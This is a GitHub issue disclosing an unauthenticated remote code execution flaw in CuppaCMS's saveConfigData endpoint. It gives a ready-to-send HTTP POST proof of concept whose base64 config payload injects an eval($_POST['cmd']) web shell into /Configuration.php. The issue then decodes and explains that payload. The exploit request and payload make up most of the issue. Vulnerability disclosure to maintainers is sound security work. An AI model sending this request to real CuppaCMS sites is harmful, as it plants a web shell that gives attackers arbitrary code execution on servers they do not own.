Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Unauthorized Remote Code Execution vulnerability exists in CuppaCMS via saveConfigData function #29

Open
bkfish opened this issue Feb 19, 2022 · 0 comments
Open

Unauthorized Remote Code Execution vulnerability exists in CuppaCMS via saveConfigData function #29

bkfish opened this issue Feb 19, 2022 · 0 comments

Comments

@bkfish
Copy link

bkfish commented Feb 19, 2022

An Unauthorized attacker can execute arbitrary php code via /classes/ajax/Functions.php, saveConfigData function

poc

POST /classes/ajax/Functions.php HTTP/1.1
Host: localhost:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1097
Cookie:  country=us; language=en; administrator_document_path=%2F

file=eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IlwiO31ldmFsKCRfUE9TVFsnY21kJ10pOy8qIn0=&function=saveConfigData

then /Configuration.php is your webshell password is cmd
image

analysis

when parameter file is

eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IlwiO31ldmFsKCRfUE9TVFsnY21kJ10pOy8qIn0=

after base64decode is
{"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}
we can code inject into the last line, and the final result is our shellcode injected to the /Configuration.php
image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@bkfish